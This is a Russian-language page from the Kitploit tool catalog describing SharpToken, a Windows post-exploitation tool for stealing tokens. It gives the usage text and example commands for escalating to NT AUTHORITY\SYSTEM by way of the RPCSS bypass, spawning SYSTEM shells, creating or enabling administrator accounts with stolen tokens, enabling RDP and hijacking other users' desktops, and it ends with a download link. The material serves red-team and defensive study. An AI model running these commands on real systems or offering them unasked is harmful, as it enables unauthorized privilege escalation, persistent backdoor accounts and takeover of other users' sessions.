Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SharpToken — Инструмент для кражи токенов Windows и повышения привилегий, который крадет утекшие токены из процессов, предоставляет доступ уровня SYSTEM, позволяет выдавать себя за пользователей и переключать рабочие столы без паролей. | Kitploit
Инструменты/GitHubGitHub/beichendream/sharptoken
Повышение привилегийЛатеральное перемещениеПост-эксплуатацияRed Teaming
GitHubbeichendream/sharptoken

SharpToken

Инструмент для кражи токенов Windows и повышения привилегий, который крадет утекшие токены из процессов, предоставляет доступ уровня SYSTEM, позволяет выдавать себя за пользователей и переключать рабочие столы без паролей.

Репозиторий
496682 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

SharpToken

Во время lateral movement в красных командах часто требуется украсть разрешения других пользователей. При наличии защиты современных EDR использовать Mimikatz для получения разрешений других пользователей сложно, а если процесс целевого пользователя не активен, то нет возможности применить "OpenProcessToken" для кражи токена.

SharpToken — это инструмент для эксплуатации утечек токенов. Он может находить утекшие токены во всех процессах системы и использовать их. Если вы являетесь низкопривилегированным сервисным пользователем, вы даже можете повысить свои привилегии до "NT AUTHORITY\SYSTEM", а также переключиться на рабочий стол целевого пользователя для выполнения действий без знания его пароля…

image

Использование

root@kitploit:~
SharpToken By BeichenDream
=========================================================

Github : https://github.com/BeichenDream/SharpToken

If you are an NT AUTHORITY\NETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORIT\YSYSTEM
e.g.
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass


Usage:

SharpToken COMMAND arguments



COMMANDS:

        list_token [process pid]        [bypass]

        list_all_token [process pid] [bypass]

        add_user    <username> <password> [group] [domain] [bypass]

        enableUser <username> <NewPassword> [NewGroup] [bypass]

        delete_user <username> [domain] [bypass]

        execute <tokenUser> <commandLine> [Interactive] [bypass]

        enableRDP [bypass]

        tscon <targetSessionId> [sourceSessionId] [bypass]


example:
    SharpToken list_token
    SharpToken list_token bypass
    SharpToken list_token 6543
    SharpToken add_user admin Abcd1234! Administrators
    SharpToken enableUser Guest Abcd1234! Administrators
    SharpToken delete_user admin
    SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
    SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
    SharpToken execute "NT AUTHORITY\SYSTEM" cmd true
    SharpToken execute "NT AUTHORITY\SYSTEM" cmd true bypass
    SharpToken tscon 1




Повышенные привилегии

В дополнение к обычному повышению привилегий через кражу токенов, SharpToken также поддерживает получение токенов с целостностью (integrity) через обход (Bypass).

Если вы являетесь пользователем NT AUTHORITY\NETWORK SERVICE и добавляете параметр bypass, SharpToken украдет токен System из службы RPCSS, то есть безусловно повысит NT AUTHORITY\NETWORK SERVICE до NT AUTHORITY\SYSTEM.

image

ListToken

Перечисляемая информация включает SID, LogonDomain, UserName, Session, LogonType, TokenType, TokenHandle (дескриптор токена после дублирования), TargetProcessId (процесс, из которого происходит токен), TargetProcessToken (дескриптор токена в исходном процессе), Groups (группа, в которой находится пользователь токена).

root@kitploit:~
SharpToken list_token

image

Перечислить токены из указанного процесса

root@kitploit:~
SharpToken list_token 468

image

Получить интерактивную оболочку

root@kitploit:~
execute "NT AUTHORITY\SYSTEM" cmd true

image

Получить результаты выполнения команды (выполняется в webshell)

root@kitploit:~
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"

image

Создать администратора с помощью украденного токена

root@kitploit:~

SharpToken add_user admin Abcd1234! Administrators

Включить администратора с помощью украденного токена

root@kitploit:~
    SharpToken enableUser Guest Abcd1234! Administrators

Удалить пользователя с помощью украденного токена

root@kitploit:~
    SharpToken delete_user admin

Использовать украденный токен для переключения на рабочий стол цели

Где 1 — это рабочий стол целевого пользователя, а 2 — рабочий стол, на который мы хотим переключиться.

root@kitploit:~
    SharpToken tscon 1 2

ЛИЦЕНЗИЯ

GNU General Public License

Ссылки

https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html

https://github.com/decoder-it/NetworkServiceExploit

https://github.com/FSecureLABS/incognito

https://github.com/chroblert/JCTokenUtil

Скачать инструмент